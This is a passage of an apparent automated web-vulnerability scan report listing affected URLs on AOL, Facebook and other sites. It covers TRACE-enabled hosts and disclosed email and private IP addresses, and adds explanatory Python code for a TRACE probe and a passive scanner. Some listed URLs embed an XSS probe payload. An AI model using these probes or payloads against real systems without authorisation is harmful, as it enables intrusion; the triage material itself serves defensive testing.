24.266. http://www.smartertools.com/smarterstats/web-analytics-seo-software-download.aspx

24.267. http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx

24.268. http://www.smartertools.com/smartertrack/help-desk-software.aspx

24.269. http://www.truveo.com/

24.270. http://www.truveo.com/client/versions/univ_ent/js/truveo.libs.util.v1304543460.js

24.271. http://www.truveo.com/search

24.272. http://www.tuaw.com/hub/app-reviews

24.273. http://xss.cx/

24.274. http://yellowpages.aol.com/

25. File upload functionality

26. TRACE method is enabled

26.1. http://a0.twimg.com/

26.2. http://alerts.aol.com/

26.3. http://anrtx.tacoda.net/

26.4. http://api.adcopy.com/

26.5. http://api.screenname.aol.com/

26.6. https://api.screenname.aol.com/

26.7. http://b.aol.com/

26.8. http://b.dailyfinance.com/

26.9. http://b.games.com/

26.10. http://b.huffingtonpost.com/

26.11. http://b.mmafighting.com/

26.12. http://b.tuaw.com/

26.13. http://blog.mapquest.com/

26.14. http://cheetah.vizu.com/

26.15. http://coverage.mqcdn.com/

26.16. http://d.tradex.openx.com/

26.17. http://d.xp1.ru4.com/

26.18. http://d1.openx.org/

26.19. http://digg.com/

26.20. http://entry-stats.huffpost.com/

26.21. http://features.mapquest.com/

26.22. http://image3.pubmatic.com/

26.23. http://legal.aol.com/

26.24. http://metrics.apple.com/

26.25. http://mobile.aol.com/

26.26. http://money.cnn.com/

26.27. http://music.aol.com/

26.28. http://o.sa.aol.com/

26.29. http://picasaweb.google.com/

26.30. http://portal.pf.aol.com/

26.31. http://portalblog.aol.com/

26.32. http://privacy.aol.com/

26.33. http://ptrack.pubmatic.com/

26.34. http://puma.vizu.com/

26.35. http://secure-us.imrworldwide.com/

26.36. http://services.crunchboard.com/

26.37. http://sportingnews.122.2o7.net/

26.38. http://surveys.aol.com/

26.39. http://t.mookie1.com/

26.40. http://tacoda.at.atwola.com/

26.41. http://vertical-stats.huffpost.com/

26.42. http://video.aol.com/

26.43. http://widgets.digg.com/

26.44. http://wireless.mapquest.com/

26.45. http://www.aim.com/

26.46. http://www.aolnews.com/

26.47. http://www.citysbest.com/

26.48. http://www.crunchboard.com/

26.49. http://www.dailyfinance.com/

26.50. http://www.dooce.com/

26.51. http://www.mmafighting.com/

26.52. http://www.moviefone.com/

26.53. http://www.popeater.com/

26.54. http://www.truveo.com/

26.55. http://www.tuaw.com/

26.56. http://xml.truveo.com/
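
The 56 hosts listed under "TRACE method is enabled" are a single finding class, so one check covers them all. The following is an added example (not part of the report, and not the scanner's own code): it builds a TRACE request with a planted marker header, and classifies a raw response as TRACE-enabled or not by looking for a 200 status with a `message/http` body that echoes the request. The host name, marker value and the request/response pair are constructed for the example; nothing below was captured from a host in the list.

```python
"""
Active check for the 'TRACE method is enabled' finding class: build a TRACE
request and classify a raw response. The sample exchange at the bottom is
constructed; it was not captured from any host in the report.
"""
import socket


def build_trace_request(host: str, path: str = "/", extra_headers=None) -> bytes:
    """Minimal HTTP/1.1 TRACE request. extra_headers lets the caller plant a
    marker header (a fake Cookie below) to see whether the server echoes it.
    Connection: close makes the reply readable until EOF."""
    lines = [f"TRACE {path} HTTP/1.1", f"Host: {host}",
             "Max-Forwards: 0", "Connection: close"]
    for name, value in (extra_headers or {}).items():
        lines.append(f"{name}: {value}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("iso-8859-1")


def parse_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status_code, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def classify_trace(request: bytes, response: bytes) -> dict:
    """TRACE is 'enabled' when the server answers 200 with a message/http body.
    'reflected' lists the request headers that came back verbatim; a reflected
    Cookie or Authorization header is what makes the finding worth reporting."""
    status, headers, body = parse_response(response)
    enabled = status == 200 and headers.get("content-type", "").startswith("message/http")
    req_lines = request.decode("iso-8859-1").split("\r\n")[1:]
    reflected = [ln for ln in req_lines if ln and ln.encode("iso-8859-1") in body]
    return {"status": status, "enabled": enabled, "reflected": reflected}


def probe_trace(host: str, port: int = 80, timeout: float = 5.0) -> dict:
    """Send the request over a plain TCP socket and classify the reply.
    Not exercised by the sample below; use only against hosts you are
    authorised to test."""
    request = build_trace_request(host, "/", {"Cookie": "sid=MARKER"})
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return classify_trace(request, b"".join(chunks))


# Constructed sample exchange (placeholder host, placeholder cookie value).
SAMPLE_REQUEST = build_trace_request("www.example.test", "/", {"Cookie": "sid=MARKER123"})
SAMPLE_ENABLED = b"HTTP/1.1 200 OK\r\nContent-Type: message/http\r\n\r\n" + SAMPLE_REQUEST
SAMPLE_DISABLED = (b"HTTP/1.1 405 Method Not Allowed\r\nAllow: GET, HEAD, POST\r\n"
                   b"Content-Length: 0\r\n\r\n")

if __name__ == "__main__":
    print(classify_trace(SAMPLE_REQUEST, SAMPLE_ENABLED))
    print(classify_trace(SAMPLE_REQUEST, SAMPLE_DISABLED))
```

Two caveats when triaging this class. A 200 with a `message/http` body is the only confirmed result; a 200 with an HTML body is usually a front-end proxy answering for the origin, and a 405 or 501 means the method is off. And the classic cross-site-tracing angle (using TRACE from script to read a cookie the page cannot see) does not work from current browsers, which refuse to send TRACE from XMLHttpRequest and fetch, so the practical fix is simply to turn the method off at the server (`TraceEnable off` in Apache httpd) rather than to treat it as a live cookie-theft path.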

27. Email addresses disclosed

27.1. http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter

27.2. http://aolmobile.aolcdn.com/js/s2c.js

27.3. http://blog.mapquest.com/

27.4. http://dev.aol.com/

27.5. http://fantasysource.sportingnews.com/baseball/free

27.6. http://fantasysource.sportingnews.com/baseball/promo

27.7. http://fantasysource.sportingnews.com/baseball/rankings

27.8. http://images.apple.com/global/scripts/lib/event_mixins.js

27.9. http://images.apple.com/global/scripts/lib/scriptaculous.js

27.10. http://legal.aol.com/copyright-reporting/

27.11. http://mobile.aol.com/product/Android/dailyfinance/

27.12. http://mobile.aol.com/product/iPhone/Autos/

27.13. http://mobile.aol.com/product/iPhone/aim/

27.14. http://mobile.aol.com/product/iPhone/aol-radio/

27.15. http://mobile.aol.com/product/iPhone/daily-finance/

27.16. http://mobile.aol.com/product/iPhone/engadget/

27.17. http://mobile.aol.com/product/iPhone/iPad/

27.18. http://mobile.aol.com/product/iPhone/mail/

27.19. http://mobile.aol.com/product/iPhone/search/

27.20. https://new.aol.com/productsweb

27.21. https://new.aol.com/productsweb/

27.22. https://new.aol.com/productsweb/

27.23. http://o.aolcdn.com/art/webwidgets/sfsw_v1_3/feeds_subscribe_en_us.js

27.24. http://o.aolcdn.com/bill.aol.com/help/help_rev/js/cookies.js

27.25. http://o.aolcdn.com/os/df/js/feeds_subscribe_en_us.js

27.26. http://o.aolcdn.com/os_merge/

27.27. http://portal.aolcdn.com/p5/_v42.5/js/override.60241.main.js

27.28. http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/

27.29. http://privacy.aol.com/

27.30. http://s.huffpost.com/assets/js.php

27.31. http://shortcuts.com/

27.32. http://st.snimg.com/js/omniture.js

27.33. http://surveys.aol.com/lib/js/main.js.php

27.34. http://top-sec.net/quran/

27.35. http://twitter.com/account/bootstrap_data

27.36. http://webcache.googleusercontent.com/search

27.37. http://www.cloudscan.me/feeds/posts/default

27.38. http://www.dailyfinance.com/markets/mostactives

27.39. http://www.games.com/browse-games/all/

27.40. http://www.games.com/game-play/family-feud/single

27.41. http://www.games.com/game/family-feud/

27.42. https://www.godaddy.com/

27.43. https://www.godaddy.com/domains/search.aspx

27.44. https://www.godaddy.com/gdshop/hosting/landing.asp

27.45. http://www.google.com/s

27.46. http://www.google.com/search

27.47. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html

27.48. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html

27.49. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html

27.50. http://www.lakewoodbeacon.org/

27.51. http://www.metricstream.com/company/contactinfo.htm

27.52. http://www.metricstream.com/js/functions_newweb.js

27.53. http://www.metricstream.com/js/functions_web.js

27.54. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

27.55. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

27.56. https://www.neodata.com/pub/snew/new_print.shtml

27.57. http://www.popeater.com/

27.58. http://www.smartertools.com/smartermail/mail-server-download.aspx

27.59. http://www.smartertools.com/smarterstats/web-analytics-seo-software-download.aspx

27.60. http://www.truveo.com/client/versions/univ_ent/js/truveo.module.jquery.jmycarousel.v1304543462.js
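
"Email addresses disclosed" above and "Private IP addresses disclosed" in the next section are both passive checks: the scanner pattern-matches every response body it sees. The following is an added example (not part of the report, and not the scanner's own code) that reproduces both checks over a response body and keeps a little surrounding text for each hit, because these two classes need triage more than most. It also goes slightly beyond the two headings by filtering candidate IPs against the RFC 1918, loopback and link-local ranges rather than matching any dotted quad. The sample body is constructed for the example.

```python
"""
Passive checks for the 'Email addresses disclosed' and 'Private IP addresses
disclosed' finding classes: scan a response body for e-mail addresses and for
RFC 1918 / loopback / link-local IPv4 addresses, returning each hit with
context. The sample body is constructed, not fetched from any listed URL.
"""
import ipaddress
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Dotted quad not preceded/followed by another digit or dot, so that a longer
# version string such as 1.2.3.4.5 is not split into a bogus address.
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "127.0.0.0/8",                                     # loopback
    "169.254.0.0/16",                                  # link-local
)]


def is_internal(addr: str) -> bool:
    """True for a syntactically valid IPv4 address inside an internal range."""
    try:
        ip = ipaddress.IPv4Address(addr)
    except ValueError:          # e.g. 300.1.1.1 from a regex match
        return False
    return any(ip in net for net in INTERNAL_NETS)


def find_emails(body: str) -> list:
    return sorted(set(EMAIL_RE.findall(body)))


def find_private_ips(body: str) -> list:
    return sorted({m for m in IPV4_RE.findall(body) if is_internal(m)})


def scan_body(body: str, context: int = 24) -> dict:
    """Run both checks; each hit is (value, surrounding text) so the reviewer
    can tell a mailto: in a footer from a leaked admin address, and a config
    string from a CSS selector or library version that merely looks like an IP."""
    hits = {"emails": [], "private_ips": []}
    for m in EMAIL_RE.finditer(body):
        hits["emails"].append((m.group(), body[max(0, m.start() - context):m.end() + context]))
    for m in IPV4_RE.finditer(body):
        if is_internal(m.group()):
            hits["private_ips"].append((m.group(), body[max(0, m.start() - context):m.end() + context]))
    return hits


# Constructed sample body: one public contact address, one internal address,
# two internal hosts, one loopback, one public IP and one version string.
SAMPLE_BODY = """<!-- constructed sample, not a real response -->
<a href="mailto:webmaster@example.test">Contact</a>
var apiHost = "http://192.168.10.25:8080/api";
/* built with widgetlib 1.2.3.4 */
upstream 172.31.4.9; public 203.0.113.7; local 127.0.0.1
<!-- ops: press@example.test -->
"""

if __name__ == "__main__":
    for kind, items in scan_body(SAMPLE_BODY).items():
        for value, ctx in items:
            print(f"{kind}: {value!r} in {ctx!r}")
```

A practical caveat for the "Private IP addresses disclosed" list that follows: many of its entries are CSS, JavaScript, PNG and GIF files. A dotted quad inside minified script or binary image data is very often a version number, a selector fragment or just bytes that happen to look like an address, which is why the context string is returned alongside each match; an address that appears next to a hostname, a port, or a configuration key is the kind worth reporting, and the rest are scanner noise to discard.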

28. Private IP addresses disclosed

28.1. http://apps.facebook.com/truveo-search

28.2. http://ar-ar.facebook.com/login.php

28.3. http://ar-ar.facebook.com/login.php

28.4. http://developers.facebook.com/

28.5. http://developers.facebook.com/plugins/

28.6. http://digg.com/submit

28.7. http://external.ak.fbcdn.net/safe_image.php

28.8. http://external.ak.fbcdn.net/safe_image.php

28.9. http://external.ak.fbcdn.net/safe_image.php

28.10. http://external.ak.fbcdn.net/safe_image.php

28.11. http://external.ak.fbcdn.net/safe_image.php

28.12. http://graph.facebook.com/10134017/picture

28.13. http://player.radio.com/player/AOLPlayer.php

28.14. http://static.ak.fbcdn.net/connect.php/js/FB.Share

28.15. http://static.ak.fbcdn.net/connect/xd_proxy.php

28.16. http://static.ak.fbcdn.net/connect/xd_proxy.php

28.17. http://static.ak.fbcdn.net/connect/xd_proxy.php

28.18. http://static.ak.fbcdn.net/connect/xd_proxy.php

28.19. http://static.ak.fbcdn.net/connect/xd_proxy.php

28.20. http://static.ak.fbcdn.net/connect/xd_proxy.php

28.21. http://static.ak.fbcdn.net/connect/xd_proxy.php

28.22. http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/kKOeJEnwuz7.css

28.23. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4wOZW9c83Yr.css

28.24. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/wRBjYtc4wBS.js

28.25. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/StBpzJi4QhY.js

28.26. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/Z6PtFE_aVAz.css

28.27. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/yhXvg7ip9xz.js

28.28. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/D97gxsfJDCQ.css

28.29. http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/9czF9X7LzHI.css

28.30. http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/ghnacGC4_R6.js

28.31. http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css

28.32. http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/AKaGrClUAcV.js

28.33. http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/ZqyvC4c4-gR.js

28.34. http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/oaBzoE1JD-P.css

28.35. http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/zicApnLO7GQ.css

28.36. http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/CYgI95uCQNj.png

28.37. http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css

28.38. http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/vLMBFMZDXfh.js

28.39. http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/_W1I0sF4Rhh.js

28.40. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/O4MC2pFJMzJ.css

28.41. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/3GUx1LLG0cl.css

28.42. http://static.ak.fbcdn.net/rsrc.php/v1/yS/r/JjnzyF9Ek6s.js

28.43. http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/abFky1K8JdH.css

28.44. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/iitWafmrmXE.css

28.45. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css

28.46. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HZ2miH23DO_.css

28.47. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/hapiV4URFzS.png

28.48. http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/2OeU71A9ZhJ.css

28.49. http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/VVIvW-eIGKG.png

28.50. http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/VoMxRc20crG.js

28.51. http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/tbLZ3xbV8NS.css

28.52. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/4Ese_3T2rw0.js

28.53. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/xKbCsbIPd0I.css

28.54. http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/OU0y6L3A4iM.js

28.55. http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/QyZCsJKRLP8.css

28.56. http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/G56BmZyYUs2.png

28.57. http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/YwmDQGiwyfx.js

28.58. http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/ijofM1PtQgR.css

28.59. http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/nKcHzwvsYY2.css

28.60. http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/h7_K_gtPWhX.css

28.61. http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/zhBrOmLKnYo.css

28.62. http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/hhXWj5xHnMP.css

28.63. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/SryDYAYpViZ.js

28.64. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/UQfC_F8UZ7s.css

28.65. http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/2XNEznNudOF.css

28.66. http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/GzjD8q3xBN2.png

28.67. http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/NoGBEHOl3Wf.css

28.68. http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/zA_b_yEgHGT.css

28.69. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/YAJGksZgfUN.css

28.70. http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/2G58JkcEnUi.js

28.71. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/z6jSieucnmR.js

28.72. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/icQpW-keluF.css

28.73. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/uunxaUcHMsN.png

28.74. http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/MGuL2bFxrJn.js

28.75. http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/NsFFrVYzya-.css

28.76. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/Z6rULnd-GE-.png

28.77. http://static.ak.fbcdn.net/rsrc.php/v1/zA/r/XvM8G8srT8f.png

28.78. http://static.ak.fbcdn.net/rsrc.php/v1/zB/r/Unmn04Ngmxd.gif

28.79. http://static.ak.fbcdn.net/rsrc.php/v1/zJ/r/RVElCNYrs5z.gif

28.80. http://static.ak.fbcdn.net/rsrc.php/v1/zQ/r/WBWgBVeCy7Y.gif

28.81. http://static.ak.fbcdn.net/rsrc.php/v1/zc/r/2nqL3wUquAI.png

28.82. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/1x0T5GU6FqP.gif

28.83. http://static.ak.fbcdn.net/rsrc.php/v1/zo/r/a-SMW6SXfy5.png

28.84. http://static.ak.fbcdn.net/rsrc.php/v1/zq/r/i2a6qsmo12r.png

28.85. http://static.ak.fbcdn.net/rsrc.php/v1/zu/r/Y4_2_kJqyhn.gif

28.86. http://video.foxbusiness.com/v/4677646/job-market-weighing-on-economic-recovery/

28.87. http://video.foxbusiness.com/v/4677647/white-house-announces-it-wont-release-bin-laden-pictures/

28.88. http://video.foxbusiness.com/v/4677755/the-need-to-boost-oil-drilling-in-us/

28.89. http://www.crunchgear.com/wp-content/uploads/2011/05/Intel-22nm_Transistor_2.jpg

28.90. http://www.crunchgear.com/wp-content/uploads/2011/05/Screen-shot-2011-05-04-at-2.13.39-PM.jpg

28.91. http://www.facebook.com/

28.92. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

28.93. http://www.facebook.com/10000082482078341583

28.94. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

28.95. http://www.facebook.com/1242845259

28.96. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

28.97. http://www.facebook.com/2008/fbml

28.98. http://www.facebook.com/AOLrealestate

28.99. http://www.facebook.com/BPAmerica

28.100. http://www.facebook.com/BPAmerica

28.101. http://www.facebook.com/BPAmerica

28.102. http://www.facebook.com/DailyFinance

28.103. http://www.facebook.com/HockeyKen

28.104. http://www.facebook.com/KickIceForever

28.105. http://www.facebook.com/LadyBonesie

28.106. http://www.facebook.com/Loizza

28.107. http://www.facebook.com/aim

28.108. http://www.facebook.com/ajax/connect/feedback.php

28.109. http://www.facebook.com/ajax/connect/vote.php

28.110. http://www.facebook.com/ajax/connect/vote.php

28.111. http://www.facebook.com/ajax/connect/vote.php

28.112. http://www.facebook.com/ajax/connect/vote.php

28.113. http://www.facebook.com/ajax/intl/language_dialog.php

28.114. http://www.facebook.com/ajax/intl/language_dialog.php

28.115. http://www.facebook.com/ajax/intl/language_dialog.php

28.116. http://www.facebook.com/ajax/reg_birthday_help.php

28.117. http://www.facebook.com/ajax/register/logging.php

28.118. http://www.facebook.com/aol

28.119. http://www.facebook.com/aolradio

28.120. http://www.facebook.com/badges

28.121. http://www.facebook.com/badges

28.122. http://www.facebook.com/badges

28.123. http://www.facebook.com/burkerkink

28.124. http://www.facebook.com/campaign/landing.php

28.125. http://www.facebook.com/campaign/landing.php

28.126. http://www.facebook.com/campaign/landing.php

28.127. http://www.facebook.com/campaign/landing.php

28.128. http://www.facebook.com/captcha/tfbimage.php

28.129. http://www.facebook.com/captcha/tfbimage.php

28.130. http://www.facebook.com/careers/

28.131. http://www.facebook.com/careers/

28.132. http://www.facebook.com/careers/

28.133. http://www.facebook.com/deedee.perez1

28.134. http://www.facebook.com/directory/pages/

28.135. http://www.facebook.com/directory/people/

28.136. http://www.facebook.com/extern/login_status.php

28.137. http://www.facebook.com/extern/login_status.php

28.138. http://www.facebook.com/extern/login_status.php

28.139. http://www.facebook.com/extern/login_status.php

28.140. http://www.facebook.com/extern/login_status.php

28.141. http://www.facebook.com/extern/login_status.php

28.142. http://www.facebook.com/extern/login_status.php

28.143. http://www.facebook.com/extern/login_status.php

28.144. http://www.facebook.com/extern/login_status.php

28.145. http://www.facebook.com/extern/login_status.php

28.146. http://www.facebook.com/extern/login_status.php

28.147. http://www.facebook.com/extern/login_status.php

28.148. http://www.facebook.com/extern/login_status.php

28.149. http://www.facebook.com/extern/login_status.php

28.150. http://www.facebook.com/extern/login_status.php

28.151. http://www.facebook.com/extern/login_status.php

28.152. http://www.facebook.com/extern/login_status.php

28.153. http://www.facebook.com/extern/login_status.php

28.154. http://www.facebook.com/extern/login_status.php

28.155. http://www.facebook.com/extern/login_status.php

28.156. http://www.facebook.com/extern/login_status.php

28.157. http://www.facebook.com/extern/login_status.php

28.158. http://www.facebook.com/extern/login_status.php

28.159. http://www.facebook.com/extern/login_status.php

28.160. http://www.facebook.com/extern/login_status.php

28.161. http://www.facebook.com/extern/login_status.php

28.162. http://www.facebook.com/extern/login_status.php

28.163. http://www.facebook.com/extern/login_status.php

28.164. http://www.facebook.com/extern/login_status.php

28.165. http://www.facebook.com/extern/login_status.php

28.166. http://www.facebook.com/extern/login_status.php

28.167. http://www.facebook.com/extern/login_status.php

28.168. http://www.facebook.com/extern/login_status.php

28.169. http://www.facebook.com/extern/login_status.php

28.170. http://www.facebook.com/extern/login_status.php

28.171. http://www.facebook.com/extern/login_status.php

28.172. http://www.facebook.com/extern/login_status.php

28.173. http://www.facebook.com/extern/login_status.php

28.174. http://www.facebook.com/extern/login_status.php

28.175. http://www.facebook.com/extern/login_status.php

28.176. http://www.facebook.com/extern/login_status.php

28.177. http://www.facebook.com/extern/login_status.php

28.178. http://www.facebook.com/extern/login_status.php

28.179. http://www.facebook.com/extern/login_status.php

28.180. http://www.facebook.com/extern/login_status.php

28.181. http://www.facebook.com/extern/login_status.php

28.182. http://www.facebook.com/extern/login_status.php

28.183. http://www.facebook.com/extern/login_status.php

28.184. http://www.facebook.com/extern/login_status.php

28.185. http://www.facebook.com/extern/login_status.php

28.186. http://www.facebook.com/extern/login_status.php

28.187. http://www.facebook.com/extern/login_status.php

28.188. http://www.facebook.com/extern/login_status.php

28.189. http://www.facebook.com/extern/login_status.php

28.190. http://www.facebook.com/extern/login_status.php

28.191. http://www.facebook.com/extern/login_status.php

28.192. http://www.facebook.com/extern/login_status.php

28.193. http://www.facebook.com/extern/login_status.php

28.194. http://www.facebook.com/extern/login_status.php

28.195. http://www.facebook.com/extern/login_status.php

28.196. http://www.facebook.com/extern/login_status.php

28.197. http://www.facebook.com/extern/login_status.php

28.198. http://www.facebook.com/extern/login_status.php

28.199. http://www.facebook.com/extern/login_status.php

28.200. http://www.facebook.com/extern/login_status.php

28.201. http://www.facebook.com/extern/login_status.php

28.202. http://www.facebook.com/extern/login_status.php

28.203. http://www.facebook.com/extern/login_status.php

28.204. http://www.facebook.com/extern/login_status.php

28.205. http://www.facebook.com/extern/login_status.php

28.206. http://www.facebook.com/extern/login_status.php

28.207. http://www.facebook.com/extern/login_status.php

28.208. http://www.facebook.com/extern/login_status.php

28.209. http://www.facebook.com/extern/login_status.php

28.210. http://www.facebook.com/extern/login_status.php

28.211. http://www.facebook.com/extern/login_status.php

28.212. http://www.facebook.com/extern/login_status.php

28.213. http://www.facebook.com/extern/login_status.php

28.214. http://www.facebook.com/extern/login_status.php

28.215. http://www.facebook.com/extern/login_status.php

28.216. http://www.facebook.com/extern/login_status.php

28.217. http://www.facebook.com/extern/login_status.php

28.218. http://www.facebook.com/extern/login_status.php

28.219. http://www.facebook.com/extern/login_status.php

28.220. http://www.facebook.com/extern/login_status.php

28.221. http://www.facebook.com/extern/login_status.php

28.222. http://www.facebook.com/extern/login_status.php

28.223. http://www.facebook.com/extern/login_status.php

28.224. http://www.facebook.com/extern/login_status.php

28.225. http://www.facebook.com/extern/login_status.php

28.226. http://www.facebook.com/extern/login_status.php

28.227. http://www.facebook.com/extern/login_status.php

28.228. http://www.facebook.com/extern/login_status.php

28.229. http://www.facebook.com/extern/login_status.php

28.230. http://www.facebook.com/extern/login_status.php

28.231. http://www.facebook.com/extern/login_status.php

28.232. http://www.facebook.com/extern/login_status.php

28.233. http://www.facebook.com/extern/login_status.php

28.234. http://www.facebook.com/extern/login_status.php

28.235. http://www.facebook.com/extern/login_status.php

28.236. http://www.facebook.com/extern/login_status.php

28.237. http://www.facebook.com/extern/login_status.php

28.238. http://www.facebook.com/extern/login_status.php

28.239. http://www.facebook.com/extern/login_status.php

28.240. http://www.facebook.com/extern/login_status.php

28.241. http://www.facebook.com/extern/login_status.php

28.242. http://www.facebook.com/extern/login_status.php

28.243. http://www.facebook.com/extern/login_status.php

28.244. http://www.facebook.com/extern/login_status.php

28.245. http://www.facebook.com/extern/login_status.php

28.246. http://www.facebook.com/extern/login_status.php

28.247. http://www.facebook.com/extern/login_status.php

28.248. http://www.facebook.com/extern/login_status.php

28.249. http://www.facebook.com/extern/login_status.php

28.250. http://www.facebook.com/extern/login_status.php

28.251. http://www.facebook.com/extern/login_status.php

28.252. http://www.facebook.com/extern/login_status.php

28.253. http://www.facebook.com/extern/login_status.php

28.254. http://www.facebook.com/extern/login_status.php

28.255. http://www.facebook.com/extern/login_status.php

28.256. http://www.facebook.com/extern/login_status.php

28.257. http://www.facebook.com/extern/login_status.php

28.258. http://www.facebook.com/extern/login_status.php

28.259. http://www.facebook.com/extern/login_status.php

28.260. http://www.facebook.com/extern/login_status.php

28.261. http://www.facebook.com/extern/login_status.php

28.262. http://www.facebook.com/extern/login_status.php

28.263. http://www.facebook.com/extern/login_status.php

28.264. http://www.facebook.com/extern/login_status.php

28.265. http://www.facebook.com/extern/login_status.php

28.266. http://www.facebook.com/extern/login_status.php

28.267. http://www.facebook.com/extern/login_status.php

28.268. http://www.facebook.com/extern/login_status.php

28.269. http://www.facebook.com/extern/login_status.php

28.270. http://www.facebook.com/extern/login_status.php

28.271. http://www.facebook.com/extern/login_status.php

28.272. http://www.facebook.com/extern/login_status.php

28.273. http://www.facebook.com/extern/login_status.php

28.274. http://www.facebook.com/extern/login_status.php

28.275. http://www.facebook.com/facebook

28.276. http://www.facebook.com/favicon.ico

28.277. http://www.facebook.com/fayse

28.278. http://www.facebook.com/find-friends

28.279. http://www.facebook.com/find-friends

28.280. http://www.facebook.com/find-friends

28.281. http://www.facebook.com/find-friends

28.282. http://www.facebook.com/gale.l.schenk

28.283. http://www.facebook.com/help/

28.284. http://www.facebook.com/help/

28.285. http://www.facebook.com/help/

28.286. http://www.facebook.com/help/

28.287. http://www.facebook.com/help/

28.288. http://www.facebook.com/home.php

28.289. http://www.facebook.com/images/policy/TRUSTe_EU.png

28.290. http://www.facebook.com/images/policy/TRUSTe_verify.png

28.291. http://www.facebook.com/izaOllie

28.292. http://www.facebook.com/jezzas

28.293. http://www.facebook.com/kimberly.christ

28.294. http://www.facebook.com/ladonna.lokey

28.295. http://www.facebook.com/lakendra.roberts

28.296. http://www.facebook.com/login.php

28.297. http://www.facebook.com/login.php

28.298. http://www.facebook.com/mapquest

28.299. http://www.facebook.com/matthew.oliveira2

28.300. http://www.facebook.com/mmafighting

28.301. http://www.facebook.com/mobile

28.302. http://www.facebook.com/mobile

28.303. http://www.facebook.com/mobile

28.304. http://www.facebook.com/mobile

28.305. http://www.facebook.com/mobile/

28.306. http://www.facebook.com/mobile/

28.307. http://www.facebook.com/mobile/

28.308. http://www.facebook.com/mobile/

28.309. http://www.facebook.com/pages/Barnesville/115038011847083

28.310. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820

28.311. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478

28.312. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059

28.313. http://www.facebook.com/pages/Editor-in-Chief/137829579583400
